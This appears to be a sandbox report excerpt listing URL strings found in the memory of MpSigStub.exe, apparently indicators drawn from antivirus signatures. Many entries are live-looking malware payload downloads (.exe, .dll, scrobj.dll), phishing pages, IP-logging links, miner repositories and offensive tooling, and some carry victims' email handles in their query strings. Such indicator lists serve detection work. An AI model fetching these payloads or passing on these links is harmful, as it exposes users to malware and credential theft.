Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://dl.dropboxusercontent.com/s/e7q3947id2jl6ux/factura6.zip?dl=0
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://dl.dropboxusercontent.com/s/m6q5dhmjpfxes94/ps2.txt
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://dl.dropboxusercontent.com/u/611200196/scan637.pdf.htm
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://dlya-detey.site/emz/reportdhlnew2.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://docs-eight-sable.vercel.app/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/d/e/2pacx-1vtrc0l1v7hke7ebcnmumoqomoajhb5togg63zkisb68sj3z7lcmv9ndk
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/feeds/default/private/full?v=3
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/uc
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/uc?id=1hajtdasfuta6vew8d5gjkd_bhnd3pwmc
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://docs.healthmade.org//tc.js
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1fxj2_ITnq1Yb6QbXw3HncRuwFAB8wN47&export=download
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: https://drp.su/
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: https://dumpitnow2138.com/
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: https://dumpster-server.herokuapp.com/manager/query
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://dvsolutionsar.com/code/post.php
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://dynafivecon.com/ds/26.gif
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: https://e3g564rtdfg.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://easb.edu.sg/templates/system/report-maerskline.php
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://ecombox.store/tbl_add.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://eetownvulgar.xyz/3/ssf.dll
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://eeyhh567.s3.eu-west-3.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://efishedo.info/?tag_id
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://eletrocoghi.com.br/drms/fert.html
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://elisegiordano.com/bwvsc2f5zwrac2hhcmtlewfzdwdhci5jb20=
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: https://emvoips.eononass.xyz/?e=%25
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: https://en.czonediver.com/ds/0502.gif
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: https://erythrocyte-gaskets.000webhostapp.com/ms/excelz/excelz/index.php?email=
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://esp.adnan.dev.hostingshouse.com/ds/151120.gif
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://esscorp.org/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://etprimewomenawards.com/apply2/uploads/w_a/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://excavationtrick.com/dir/
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://exploshot.com/24.gif
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://expressen.se/docprod/templates/bot_tjansteskrivelse.docx
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: https://extranet.carlsonwagonlit.com/gdsscripts/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://extraosseous.com/zik/
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: https://f.coka.la/6wzxbj.sct
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://faxzmessageservice.club
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://fazadminmessae.info
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://fazalandsons.com.pk/wp-includes/ixr/class-ixr-base64.php
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: https://feedbackportal.download/ecm/ibm/3173379797/converter.dot
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: https://ferra.xyz/glsdil.php
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://fersite24.xyz/sa2234332324if3g4f23.php
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://filedropper.com/main/
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/gr-nte-rgwea-fbg-nh-yt.appspot.com/o/dbvfuery%2fw-euy-f8
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/jv-i4t-78gy-9h.appspot.com/o/bg-i547-gt9%2f84-75tr-g87.h
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/project-2141562284063338550.appspot.com/o/57-8574-54%2fg
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/project-6870194580473866225.appspot.com/o/f-grg45-t%2f24
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/relaxdaysun.appspot.com/o/g%20ct%206%20yg-u%2ff%20cr%20y
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://flopyrhnd.tk/pr/lan.php
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://flyaircario.com/i/post.php
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: https://folkloreeconomy.com/next.php
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://fqe.short.gy/
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://fqe.short.gy/gclxo6
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://fqe.short.gy/j7xs8j
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://fr-an1.link/?e=atloperat
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://frabey.de/templates/elsterwetter16b/images/system/hp.gf
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://freelanceranik.com/group.php
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: https://friendoffishing.com//wp-content/themes/calliope/template-parts/wp_data.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://fs01n4.sendspace.com/dlpro/20fb7f511bc258709195b9ca0c6c258e/595e5d75/k6zafp/x6iu1omg_2_.zips
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://fs01n5.sendspace.com/dl/23da2e4841c1800d1954130c638d13c3/575d2f1645706e13/ooru9w/google%20ch
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: https://fslqzt.info/
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://fx.pb-invioce.online/?e=accounts
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://fx.pb-invioce.online/?e=info
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://fx.pb-invioce.online/?e=m.turqueto
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://gabejesus.net/admin/model/design/reportmaersknew.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://gantiatiainzx.us-south.cf.appdomain.cloud/?bbre=zxoiasxz#/abrimvh-&
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://gaspee.info/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://gatipackers-movers.com/wp-content/plugins/(
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://geoconsultantservices.com/some/next.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://get.adobe
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://gettraff.ru/
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: https://gettraff.ru/aws?keyword=
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://gez.org.zw/errorpages/load/
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://gfdefrgthyujjyhtbgrvfcdxs.s3.us-east-2.amazonaws.com/afghtyujytgrfdegt.html
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://gfoundries.ru/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://gg.gg/ig6f0
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://ggtraff.ru/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://gidbasket.com/drms/ind.html
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://gist.githubusercontent.com/razdorhere
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://github-production-release-asset-2e65be.s3.amazonaws.com/512295
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://github-production-release-asset-2e65be.s3.amazonaws.com/68070804
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Bendr0id/xmrigCC
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/JulianG97/TextEditor
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Programmist6996
Source: MpSigStub.exe, 00000026.00000003.18291167151.00000138BE1C8000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/bendr0id/xmrigcc
Source: MpSigStub.exe, 00000026.00000003.18291167151.00000138BE1C8000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/bendr0id/xmrigcc-amd
Source: MpSigStub.exe, 00000026.00000003.18291167151.00000138BE1C8000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/bendr0id/xmrigcc/
Source: MpSigStub.exe, 00000026.00000003.18291167151.00000138BE1C8000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/bendr0id/xmrigcchttps://github.com/bendr0id/xmrigcc-amdhttps://github.com/bendr0i
Source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/georgw777/
Source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/georgw777/MediaManager
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/nwoolls/multiminer
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/robertdavidgraham/masscan
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/robertdavidgraham/masscanx
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/samratashok/nishang
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://gmaax.in/wp-includes/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://gmaax.in/wp-includes/blocks/embed/
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: https://go.wikitextbooks.info
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/5gdfwn
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/t4wd4iscrobj.dll
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/yuzvvg
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: https://goodbyegraffitiseattle.com/jhjdhjd/files/index.php)
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: https://goofy-davinci-6ad239.netlify.app/)/s/uri
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://grabify.link/ibac74
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://grace-memorial-church.com/shares/share/fghjke77383oned/share
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://gritodopovo.com.br/doc/reserva.wiz
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://gritodopovo.com.br/natalidade/new.wiz
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: https://gruasphenbogota.com/c74hwggxi/ka.html
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://gtec24.com/0mqp0yn6/kk.html
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://h9-mil.live/?e=anita.masyk
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: https://hamality.xyz
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: https://handrug.com.py/baterfly/aleacarte.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://hard10.authorizeddns.us/1?zved58il3scrobj.dll
Source: MpSigStub.exe, 00000026.00000003.18351149084.00000138BD6B0000.00000004.00000001.sdmp	String found in binary or memory: https://hardshipaccompany.com/next.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://hardx2.mydad.info/1?ef8il3hesscrobj.dll
Source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp	String found in binary or memory: https://hastebin.com/raw/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://hawkloger.shortcm.li/
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://hghfjklkjlk.dvgwrgwjrgkhowrg.gb.net/qwertyxls/zip/document.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://hillsbed.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: https://hitechceramics.com/
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: https://hitechceramics.com/tism/processor.php
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: https://hitecsec.org/wp-includes/js/reportdhlnew.php
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: https://hjnkmjkm.duckdns.org/bb/sf-express.php
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://hk.sd-inhcice.online/?e=sylvie.nicol
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: https://holidayinndarlingharbour-my.sharepoint.com/personal/dos_holidayinndarlingharbour_com_au/_lay
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://houses43s.somdhouths.xyz/?e=
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://http://bit.do/fq3bf
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://humana.service-now.com/arp
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://hvaclinic.com/redirect/amvhbi1mcmfuy29pcy52yxnzzxvyqgjlzmvzys5jb20=
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://hx.ns-inhince.online/?e=arnaldi
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://i.gyazo.com/
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://i.gyazo.com/7fc7a0126fd7e7c8bcb89fc52967c8ec.png
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: https://i.imgur.com/c1skhwk.png
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://ia601404.us.archive.org/7/items/bypass_98778/bypass_98778.txt
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: https://icam%.cl/wp%-content/%.%.%./%.%.%./x3%.php
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://iffusedtrac.xyz/3/bbc.exe
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://ikkon.pk/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://immobiliareneri.casa/drms/ind.html
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://indygrace.com/sun/scan-img-rcsh-253018.exe
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://ines-arnshoff.de/
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: https://inetaccelerator.ru/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://injectsorals.com/11/i.php
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://injectsorals.com/oja/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://integratedcombatcentre.com.au/wp-content/uploads/tmp/outlook365/outlook365/index.php
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: https://ip4.seeip.org
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://iplusprima.life/wp-content/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/b2qsmx
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/eakecx
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/fnchq3
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/nr85ic
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/p1cyuo
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/qyzae1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/x73tnb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/xwjqn2
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://istitutobpascalweb.it/mynotescom/renoovohostinglilnuxadvanced.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/2aed6
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/9h7cn
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/cshd3
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/intdn
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/jbbhj
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/oiowg
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/vlafv
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/vyqcm
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://itvantaqe.com/wp/wp-admin/user/class.php
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://izmirdentalimplant.net/wp-content/themes/neve/next.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://j-k9.club/?e=JPohlman
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://jabaltoor.com/copy/img/blog/cat-post/r7gnor1h0.php
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: https://jadr223.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://jammuking.xyz/wp-content/upgrabe/
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://jaypalsinh.ngsoftweb.eEvvmU%in/OLD_07032021/classeEvvmU%es/PHPExcel/Calculation/Token/pm4Cb7
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: https://jbg-electric.com/css/x0sjv3efx.php
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://jbrealestategroups.com/wp-content/themes/bridge/extendvc/msg.
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://jbs-stamping.square.site/
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: https://jcenter.bintray.com
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: https://jdjuwuryh.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://jiagnmehn.gq/post.php
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: https://jira3.cerner.com/rest/api/2/issue/
